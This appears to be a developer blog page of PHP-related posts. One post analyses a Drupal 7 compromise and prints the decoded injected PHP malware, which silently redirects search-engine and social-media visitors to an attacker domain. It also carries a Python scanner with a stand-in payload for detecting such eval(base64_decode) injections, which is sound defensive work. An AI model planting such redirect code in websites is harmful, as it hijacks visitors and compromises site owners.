PHP
Refactoring a Flex project with Mate, ZendAMF and MVC
Sometimes, software development projects do not go the way we want...
Here, perhaps intimidated by the technical issues, we first set out to meet the technical requirements while setting the design phase aside.
The goal was to trigger a Flash game from a physical push button that writes to the serial port.
But the Flash player has no access to low-level devices, so we built a bridge between the OS and Flex: a small Java program that relays messages from the serial port to a TCP socket.
The problem was that once these uncertainties were removed, we started development right away, without a true model of the application.
Big mistake!
If one day you are offered such a deal, get out!
As for me, I stayed, and 2 years have now gone by...
Of course, we recently had to deliver the product to the customer, and so we were compelled to refactor the code to produce something that meets the Tanukis web-studio quality requirements...
This is not the game code but the AIR application that configures it. Obviously, since this is a commercial project, I cannot release the sources.
Here we go, a 10-day Tanukis refactoring crash course!
Securing my Ubuntu Drupal install
Recently, my Drupal 7 site was compromised: most PHP files in /sites/all (the directory where Drupal stores user-contributed modules and themes) had been modified and injected with this string:
eval(base64_decode("...<base64 payload>..."));
Here is what the base64 payload decodes to:
error_reporting(0);                          // silence every PHP error so nothing reveals the payload
$qazplm=headers_sent();
if( ! $qazplm ) {                            // only act while a redirect header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if( $uag ) {                             // ignore requests that carry no User-Agent
        // visitor arrived from a search engine, ad network, URL shortener or social site
        if( stristr( $referer,"yandex") or stristr( $referer,"yahoo" ) or stristr( $referer,"google" ) or stristr( $referer,"bing" ) or stristr( $referer,"rambler" ) or stristr( $referer,"gogo" )
            or stristr( $referer,"live.com" ) or stristr( $referer,"aport" ) or stristr( $referer,"nigma" ) or stristr( $referer,"webalta" ) or stristr( $referer,"baidu.com" )
            or stristr( $referer,"doubleclick.net" ) or stristr( $referer,"begun.ru" ) or stristr( $referer,"stumbleupon.com" ) or stristr( $referer,"bit.ly" ) or stristr( $referer,"tinyurl.com" )
            or stristr( $referer,"clickbank.net" ) or stristr( $referer,"blogspot.com" ) or stristr( $referer,"myspace.com" ) or stristr( $referer,"facebook.com" ) or stristr( $referer,"aol.com" ) ) {
            // skip cached copies and "inurl:" searches; with "or" this is false only when the referer holds both words
            if( ! stristr( $referer,"cache" ) or ! stristr( $referer,"inurl" ) ){
                header("Location: http://prsnbrk.osa.pl/");   // silent redirect to the attacker's site
                exit();
            }
        }
    }
}
This code tests the referer and, if it comes from a well-known site (Facebook, Yahoo, Google, ...), redirects the visitor to http://prsnbrk.osa.pl/. But if you type the URL directly, you see nothing. So anyone who finds my site through Google gets redirected... Viciously effective...
My 1&1 server was more of a dev platform (athome-training.com ...) than a true production-ready server. Security was not a priority, and breaking into my server must have been a pleasure... Obviously, I did not bother to properly manage my log files, which made forensic analysis impossible...
So I did a factory reset, rebuilt everything from the ground up, read as much as I could, and took notes about what I did. Here is the account of my road to security... If you see something wrong, please comment ;)
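As an added example (not code from the original post), here is a small Python scanner that walks a Drupal tree such as sites/all, finds the eval(base64_decode(...)) injections described above, decodes each payload and reports which of the behaviours explained above it exhibits. The indicator names, the list of Drupal PHP extensions and the constructed sample files are assumptions of this example.

```python
import base64
import os
import re
# Injection pattern found in the post: eval(base64_decode("<payload>"));
EVAL_B64_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;')
# Behaviours of the decoded payload described in the post (indicator names are ours).
INDICATORS = {
    "error_reporting(0)": r"error_reporting\s*\(\s*0\s*\)",
    "referer check": r"HTTP_REFERER",
    "search-engine match": r"stristr\s*\(\s*\$\w+\s*,\s*[\"'](?:google|yahoo|bing|yandex|facebook)",
    "redirect": r"header\s*\(\s*[\"']Location:",
}
DRUPAL_PHP_EXTS = (".php", ".inc", ".module", ".install", ".theme", ".profile")  # assumed Drupal 7 list

def decode_payloads(php_source):
    """Return the decoded text of every eval(base64_decode(...)) payload in one file's source."""
    decoded = []
    for b64 in EVAL_B64_RE.findall(php_source):
        try:  # validate=True rejects blobs that merely look like base64
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def classify_payload(payload):
    """Return the sorted names of the indicators whose pattern matches the decoded payload."""
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, payload))

def scan_file_text(php_source):
    """Return [(decoded_payload, [indicator, ...]), ...] for each injection in the file text."""
    return [(p, classify_payload(p)) for p in decode_payloads(php_source)]

def scan_tree(root):
    """Walk a Drupal tree (e.g. sites/all) and map each infected file path to its findings."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in (n for n in files if n.endswith(DRUPAL_PHP_EXTS)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_file_text(fh.read())
            if found:
                hits[path] = found
    return hits

# Constructed sample files: a stand-in payload in the style of the post's (NOT the original blob,
# placeholder redirect domain) inside a module file, plus a clean module file for comparison.
SAMPLE_PAYLOAD = ('error_reporting(0);$referer=$_SERVER["HTTP_REFERER"];'
                  'if(stristr($referer,"google")){header("Location: http://redirect.invalid/");exit();}')
INFECTED_FILE = '<?php\neval(base64_decode("%s"));\nfunction mymodule_menu() {}\n' % base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
CLEAN_FILE = '<?php\nfunction mymodule_menu() {}\n'
```

Run scan_tree("sites/all") on a copy of the compromised tree; a payload that decodes but matches no indicator is still reported, with an empty indicator list, so it can be inspected by hand.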
Pro PHP Programming
Apress has just released a new book on PHP: Pro PHP Programming. Co-written by Peter MacIntyre, Brian Danchilla and Mladen Gogala, the book offers an ambitious menu:
Apress, The Definitive Guide to Drupal 7
Apress has just released a compendium on Drupal, written by many important contributors to the Drupal community. With more than 1000 pages, 40 chapters and 9 appendices, this book is very, very rich.
Ajax cross-domain on Jersey RESTful web services
At work, at LesTanukis, I'm working on a REST web service served by the open source application server GlassFish and the REST library Jersey. I asked myself how to query these web services directly from a web client, i.e. how to get around the same-origin policy restrictions. Here are some notes that recount my route.
Real-World Solutions for Developing High-Quality PHP Frameworks and Applications by Sebastian Bergmann
Sebastian Bergmann, a prominent member of the PHP community and the author of PHPUnit, has just released an absolutely essential book about quality in PHP projects.